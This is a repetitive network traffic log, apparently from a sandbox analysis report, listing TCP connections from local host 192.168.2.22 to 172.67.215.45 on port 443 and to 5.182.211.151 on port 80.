Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
